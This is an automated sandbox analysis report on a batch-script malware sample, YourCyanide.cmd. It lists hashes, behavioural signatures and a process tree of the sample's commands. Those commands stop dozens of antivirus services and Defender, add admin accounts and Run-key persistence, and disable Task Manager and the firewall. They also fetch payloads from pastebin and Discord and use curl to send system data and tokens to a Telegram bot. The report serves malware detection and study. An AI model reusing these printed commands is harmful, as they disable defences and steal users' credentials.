Analysis
max time kernel: 52s
max time network: 118s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 18-05-2022 00:35
Static task: static1
Behavioral task: behavioral1
Sample: YourCyanide.cmd
Resource: win10v2004-20220414-en
General
Target: YourCyanide.cmd
Size: 90KB
MD5: 4cb725f17bec289507f9e8249c8ea80e
SHA1: a7034e84cb884bf90e61ce3b621424bec57334ae
SHA256: 1f3e3ed8e708fc98bddddca71de7b9e21c6d2a4b2bf019c260e0b707140f9f62
SHA512: 776982eab99b1285c209b71e2fd39e2765e9ce392a6c310208e72157dab3895b0b5a7c8b63d72e69bc507c88faec90a2f8f57788873f1a617a2659e22d2b7288
Malware Config
Extracted
https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe
Extracted
C:\Users\Admin\Desktop\YcynNote.txt
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
Processes: powershell.exe
flow 19, pid 4540, process powershell.exe
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes: netsh.exe
pid 2428, process netsh.exe
-
Modifies Windows Firewall 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: cmd.exe
Key value queried: \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation (process: cmd.exe)
-
Adds Run key to start application 2 TTPs 6 IoCs
Processes: reg.exe, reg.exe, netsh.exe
Key created: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run (process: reg.exe)
Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_4964_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\YourCyanide.cmd" (process: reg.exe)
Key created: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run (process: reg.exe)
Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_5072_toolbar = "ycynlog.cmd" (process: reg.exe)
Key created: \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Windows\CurrentVersion\Run (process: netsh.exe)
Set value (str): \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVAADA = "C:\\Windows\\.bat" (process: netsh.exe)
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in Windows directory 2 IoCs
Processes: cmd.exe
File opened for modification: C:\Windows\win.ini (process: cmd.exe)
File opened for modification: C:\Windows\system.ini (process: cmd.exe)
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes: ipconfig.exe
pid 4692, process ipconfig.exe
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 1 IoCs
Processes: taskkill.exe
pid 3016, process taskkill.exe
-
Modifies registry class 21 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
NTFS ADS 4 IoCs
Processes: cmd.exe, cmd.exe
File opened for modification: C:\Users\Admin\AppData\Local\Temp\%YTsAV:~24 (process: cmd.exe)
File opened for modification: C:\Users\Admin\%ONRsX:~13 (process: cmd.exe)
File opened for modification: C:\Users\Admin\%onRsx:~13 (process: cmd.exe)
File opened for modification: C:\Users\Admin\%RafEw:~4 (process: cmd.exe)
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 57 IoCs
-
Suspicious use of AdjustPrivilegeToken 10 IoCs
Processes: powershell.exe, taskkill.exe, powershell.exe, powershell.exe, netsh.exe, powershell.exe, netsh.exe, powershell.exe, netsh.exe, powershell.exe
Token: SeDebugPrivilege, pid 4252, process powershell.exe
Token: SeDebugPrivilege, pid 3016, process taskkill.exe
Token: SeDebugPrivilege, pid 4540, process powershell.exe
Token: SeDebugPrivilege, pid 4060, process powershell.exe
Token: SeDebugPrivilege, pid 2220, process netsh.exe
Token: SeDebugPrivilege, pid 1264, process powershell.exe
Token: SeDebugPrivilege, pid 3132, process netsh.exe
Token: SeDebugPrivilege, pid 2652, process powershell.exe
Token: SeDebugPrivilege, pid 2012, process netsh.exe
Token: SeDebugPrivilege, pid 2564, process powershell.exe
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes: powershell.exe
pid 2652, process powershell.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes: attrib.exe, attrib.exe
pid 1624, process attrib.exe
pid 4872, process attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd"1⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd2⤵
- Views/modifies file attributes
PID:4872 -
C:\Windows\system32\rundll32.exeRUNDLL32 USER32.DLL SwapMouseButton2⤵PID:4704
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:4812
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1484
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1620
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:444
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:724
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4252 -
C:\Windows\system32\net.exenet localgroup administrators session /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:4724 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD3⤵PID:4636
-
C:\Windows\system32\reg.exereg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_4964_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd /f2⤵
- Adds Run key to start application
PID:2020 -
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f2⤵PID:4412
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1560
-
C:\Windows\system32\net.exenet stop "WinDefend"2⤵
- Suspicious use of WriteProcessMemory
PID:4644 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"3⤵PID:3956
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵
- Suspicious use of WriteProcessMemory
PID:3476 -
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2928
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im "MSASCui.exe"2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3016 -
C:\Windows\system32\net.exenet stop "wuauserv"2⤵
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wuauserv"3⤵PID:4376
-
C:\Windows\system32\net.exenet stop "security center"2⤵
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "security center"3⤵PID:2584
-
C:\Windows\system32\net.exenet stop sharedaccess2⤵PID:4604
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sharedaccess3⤵PID:1444
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode-disable2⤵PID:3768
-
C:\Windows\system32\net.exenet stop "Security Center" /y2⤵PID:1808
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Security Center" /y3⤵PID:4016
-
C:\Windows\system32\net.exenet stop "Automatic Updates" /y2⤵PID:1408
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Automatic Updates" /y3⤵PID:3140
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵PID:3076
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y3⤵PID:2868
-
C:\Windows\system32\net.exenet stop "SAVScan" /y2⤵PID:3528
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVScan" /y3⤵PID:2216
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Firewall Monitor Service" /y2⤵PID:3732
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y3⤵PID:428
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto-Protect Service" /y2⤵PID:1348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y3⤵PID:4872
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵PID:2504
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵PID:5016
-
C:\Windows\system32\net.exenet stop "McAfee Spamkiller Server" /y2⤵PID:1724
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y3⤵PID:1856
-
C:\Windows\system32\net.exenet stop "McAfee Personal Firewall Service" /y2⤵PID:4788
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y3⤵PID:4408
-
C:\Windows\system32\net.exenet stop "McAfee SecurityCenter Update Manager" /y2⤵PID:1968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y3⤵PID:2460
-
C:\Windows\system32\net.exenet stop "Symantec SPBBCSvc" /y2⤵PID:3372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y3⤵PID:2928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y3⤵PID:1740
-
C:\Windows\system32\net.exenet stop "Ahnlab Task Scheduler" /y2⤵PID:5052
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵PID:3700
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵PID:1144
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵PID:1056
-
C:\Windows\system32\net.exenet stop vrmonsvc /y2⤵PID:3016
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vrmonsvc /y3⤵PID:3488
-
C:\Windows\system32\net.exenet stop MonSvcNT /y2⤵PID:4840
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MonSvcNT /y3⤵PID:4196
-
C:\Windows\system32\net.exenet stop SAVScan /y2⤵PID:1016
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVScan /y3⤵PID:4520
-
C:\Windows\system32\net.exenet stop NProtectService /y2⤵PID:936
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NProtectService /y3⤵PID:404
-
C:\Windows\system32\net.exenet stop ccSetMGR /y2⤵PID:2220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMGR /y3⤵PID:1460
-
C:\Windows\system32\net.exenet stop ccEvtMGR /y2⤵PID:4712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMGR /y3⤵PID:1376
-
C:\Windows\system32\net.exenet stop srservice /y2⤵PID:3012
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop srservice /y3⤵PID:4824
-
C:\Windows\system32\net.exenet stop "Symantec Network Drivers Service" /y2⤵PID:3708
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y3⤵PID:4316
-
C:\Windows\system32\net.exenet stop "norton Unerase Protection" /y2⤵PID:4552
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton Unerase Protection" /y3⤵PID:2028
-
C:\Windows\system32\net.exenet stop MskService /y2⤵PID:2488
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MskService /y3⤵PID:3724
-
C:\Windows\system32\net.exenet stop MpfService /y2⤵PID:3716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MpfService /y3⤵PID:2140
-
C:\Windows\system32\net.exenet stop mcupdmgr.exe /y2⤵PID:3444
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mcupdmgr.exe /y3⤵PID:2128
-
C:\Windows\system32\net.exenet stop "McAfeeAntiSpyware" /y2⤵PID:1580
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y3⤵PID:4128
-
C:\Windows\system32\net.exenet stop helpsvc /y2⤵PID:3520
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop helpsvc /y3⤵PID:2864
-
C:\Windows\system32\net.exenet stop ERSvc /y2⤵PID:3860
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ERSvc /y3⤵PID:2336
-
C:\Windows\system32\net.exenet stop "*norton*" /y2⤵PID:3252
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*norton*" /y3⤵PID:2940
-
C:\Windows\system32\net.exenet stop "*Symantec*" /y2⤵PID:3480
-
C:\Windows\system32\net.exenet stop "*McAfee*" /y2⤵PID:4780
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*McAfee*" /y3⤵PID:2504
-
C:\Windows\system32\net.exenet stop ccPwdSvc /y2⤵PID:4708
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccPwdSvc /y3⤵PID:2020
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵PID:1684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y3⤵PID:2288
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵PID:1672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop navapsvc /y3⤵PID:2896
-
C:\Windows\system32\net.exenet stop "Serv-U" /y2⤵PID:456
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Serv-U" /y3⤵PID:208
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵PID:4644
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y 3⤵ PID:4560
-
C:\Windows\system32\net.exe net stop "norton AntiVirus Client" /y 2⤵ PID:4332
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "norton AntiVirus Client" /y 3⤵ PID:1056
-
C:\Windows\system32\net.exe net stop "Symantec AntiVirus Client" /y 2⤵ PID:1876
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y 3⤵ PID:3904
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 localgroup administrators session /ADD 4⤵ PID:3488
-
C:\Windows\system32\net.exe net stop "norton AntiVirus Server" /y 2⤵ PID:4044
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "norton AntiVirus Server" /y 3⤵ PID:1500
-
C:\Windows\system32\net.exe net stop "NAV Alert" /y 2⤵ PID:3804
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "NAV Alert" /y 3⤵ PID:3960
-
C:\Windows\system32\net.exe net stop "Nav Auto-Protect" /y 2⤵ PID:1336
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "Nav Auto-Protect" /y 3⤵ PID:4324
-
C:\Windows\system32\net.exe net stop "McShield" /y 2⤵ PID:1252
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "McShield" /y 3⤵ PID:1204
-
C:\Windows\system32\net.exe net stop "DefWatch" /y 2⤵ PID:4680
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "DefWatch" /y 3⤵ PID:1088
-
C:\Windows\system32\net.exe net stop eventlog /y 2⤵ PID:1444
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop eventlog /y 3⤵ PID:2064
-
C:\Windows\system32\net.exe net stop InoRPC /y 2⤵ PID:2924
-
C:\Windows\system32\net.exe net stop InoRT /y 2⤵ PID:3216
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop InoRT /y 3⤵ PID:4700
-
C:\Windows\system32\net.exe net stop InoTask /y 2⤵ PID:1636
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop InoTask /y 3⤵ PID:5016
-
C:\Windows\system32\net.exe net stop "norton AntiVirus Auto Protect Service" /y 2⤵ PID:4704
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y 3⤵ PID:4056
-
C:\Windows\system32\net.exe net stop "norton AntiVirus Client" /y 2⤵ PID:4248
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "norton AntiVirus Client" /y 3⤵ PID:3000
-
C:\Windows\system32\net.exe net stop "norton AntiVirus Corporate Edition" /y 2⤵ PID:1856
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y 3⤵ PID:660
-
C:\Windows\system32\net.exe net stop "ViRobot Professional Monitoring" /y 2⤵ PID:4724
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y 3⤵ PID:1684
-
C:\Windows\system32\net.exe net stop "PC-cillin Personal Firewall" /y 2⤵ PID:3752
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y 3⤵ PID:4760
-
C:\Windows\system32\net.exe net stop "Trend Micro Proxy Service" /y 2⤵ PID:3372
-
C:\Windows\system32\net.exe net stop "Trend NT Realtime Service" /y 2⤵ PID:216
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "Trend NT Realtime Service" /y 3⤵ PID:3776
-
C:\Windows\system32\net.exe net stop "McAfee.com McShield" /y 2⤵ PID:456
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "McAfee.com McShield" /y 3⤵ PID:4516
-
C:\Windows\system32\net.exe net stop "McAfee.com VirusScan Online Realtime Engine" /y 2⤵ PID:4564
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y 3⤵ PID:2116
-
C:\Windows\system32\net.exe net stop "SyGateService" /y 2⤵ PID:1280
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "SyGateService" /y 3⤵ PID:5052
-
C:\Windows\system32\net.exe net stop "Sygate Personal Firewall Pro" /y 2⤵ PID:1064
-
C:\Windows\system32\net.exe net stop "Sophos Anti-Virus" /y 2⤵ PID:3700
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "Sophos Anti-Virus" /y 3⤵ PID:4856
-
C:\Windows\system32\net.exe net stop "Sophos Anti-Virus Network" /y 2⤵ PID:4456
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y 3⤵ PID:1500
-
C:\Windows\system32\net.exe net stop "eTrust Antivirus Job Server" /y 2⤵ PID:2356
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y 3⤵ PID:3960
-
C:\Windows\system32\net.exe net stop "eTrust Antivirus Realtime Server" /y 2⤵ PID:3748
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y 3⤵ PID:4840
-
C:\Windows\system32\net.exe net stop "Sygate Personal Firewall Pro" /y 2⤵ PID:1016
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y 3⤵ PID:1100
-
C:\Windows\system32\net.exe net stop "eTrust Antivirus RPC Server" /y 2⤵ PID:1252
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y 3⤵ PID:1540
-
C:\Windows\system32\net.exe net stop netsvcs 2⤵ PID:3356
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop netsvcs 3⤵ PID:4832
-
C:\Windows\system32\net.exe net stop spoolnt 2⤵ PID:1844
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop spoolnt 3⤵ PID:2780
-
C:\Windows\system32\rundll32.exe RUNDLL32 USER32.DLL SwapMouseButton 2⤵ PID:3056
-
C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe /K black.bat 2⤵ PID:3772
-
C:\Windows\system32\scrnsave.scr C:\Windows\system32\scrnsave.scr /s 3⤵ PID:4208
-
C:\Windows\system32\scrnsave.scr C:\Windows\system32\scrnsave.scr /s 3⤵ PID:1364
-
C:\Windows\system32\scrnsave.scr C:\Windows\system32\scrnsave.scr /s 3⤵ PID:4752
-
C:\Windows\system32\tskill.exe tskill iexplore 2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3180
-
C:\Windows\system32\tskill.exe tskill msnmsgr 2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4576
-
C:\Windows\system32\tskill.exe tskill excel 2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4912
-
C:\Windows\system32\tskill.exe tskill iTunes 2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2560
-
C:\Windows\system32\tskill.exe tskill calc 2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1264
-
C:\Windows\system32\tskill.exe tskill msaccess 2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3484
-
C:\Windows\system32\tskill.exe tskill safari 2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4700
-
C:\Windows\system32\tskill.exe tskill mspaint 2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4076
-
C:\Windows\system32\tskill.exe tskill outlook 2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2812
-
C:\Windows\system32\tskill.exe tskill WINWORD 2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4056
-
C:\Windows\system32\tskill.exe tskill msnmsgr 2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4704
-
C:\Windows\system32\tskill.exe tskill firefox 2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3132
-
C:\Windows\system32\tskill.exe tskill LimreWire 2⤵
- Suspicious behavior: EnumeratesProcesses
PID:176
-
C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe /K 2b2crypt.cmd 2⤵ PID:112
-
C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe /K 2b2crypt.m.cmd 2⤵ PID:4192
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest https://pastebin.com/raw/2K5m42Xp -outfile ycynlog.cmd" 2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4540
-
C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe /K ycynlog.cmd 2⤵
- NTFS ADS
PID:1068
-
C:\Windows\system32\attrib.exe attrib +h +s ycynlog.cmd 3⤵
- Views/modifies file attributes
PID:1624
-
C:\Windows\system32\reg.exe reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_5072_toolbar" /t "REG_SZ" /d ycynlog.cmd /f 3⤵
- Adds Run key to start application
PID:4076
-
C:\Windows\system32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\.bat /f 3⤵
- Modifies registry key
PID:2900
-
C:\Windows\system32\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f 3⤵ PID:2000
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe', 'GetToken.exe')" 3⤵ PID:2012
-
C:\Users\Admin\GetToken.exe GetToken.exe 3⤵ PID:2428
-
C:\Windows\system32\curl.exe curl -s -o IP.txt https://ipv4.wtfismyip.com/text 3⤵ PID:3584
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >C:\Users\Admin\apps.txt" 3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
C:\Windows\system32\curl.exe curl -v -F document=@C:\Users\Admin\apps.txt https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538 3⤵ PID:1404
-
C:\Windows\system32\ipconfig.exe ipconfig 3⤵
- Gathers network information
PID:4692
-
C:\Windows\system32\getmac.exe getmac 3⤵ PID:1548
-
C:\Windows\System32\Wbem\WMIC.exe wmic cpu get caption, name, deviceid, numberofcores, maxclockspeed, status 3⤵ PID:1140
-
C:\Windows\System32\Wbem\WMIC.exe wmic computersystem get totalphysicalmemory 3⤵ PID:1672
-
C:\Windows\System32\Wbem\WMIC.exe wmic partition get name,size,type 3⤵ PID:1972
-
C:\Windows\system32\systeminfo.exe systeminfo 3⤵
- Gathers system information
PID:3136
-
C:\Windows\System32\Wbem\WMIC.exe wmic path softwarelicensingservice get OA3xOriginalProductKey 3⤵ PID:1580
-
C:\Windows\system32\tasklist.exe tasklist 3⤵
- Enumerates processes with tasklist
PID:1672
-
C:\Windows\system32\curl.exe curl -v -F document=@C:\Users\Admin\userdata.txt https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538 3⤵ PID:4452
-
C:\Windows\system32\curl.exe curl -v -F document=@"Tokens.txt" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538 3⤵ PID:4672
-
C:\Windows\system32\curl.exe curl -v -F document=@"Tokens.txt" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538 3⤵ PID:4224
-
C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe /K FuckPorts.cmd 2⤵ PID:1540
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Set-ExecutionPolicy Unrestricted" 3⤵ PID:2220
-
C:\Windows\system32\net.exe net localgroup administrators session /ADD 3⤵ PID:3904
-
C:\Windows\system32\netsh.exe netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415 3⤵ PID:1968
-
C:\Windows\system32\netsh.exe netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627 3⤵ PID:2812
-
C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe /K FuckPorts.cmd 2⤵ PID:2448
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Set-ExecutionPolicy Unrestricted" 3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1264
-
C:\Windows\system32\net.exe net localgroup administrators session /ADD 3⤵ PID:2688
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 localgroup administrators session /ADD 4⤵ PID:2484
-
C:\Windows\system32\netsh.exe netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415 3⤵ PID:4996
-
C:\Windows\system32\netsh.exe netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627 3⤵ PID:532
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:2020
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2576
-
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3132
-
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273
- Adds Run key to start application
PID:2900
-
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153
- Executes dropped EXE
PID:2428
-
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153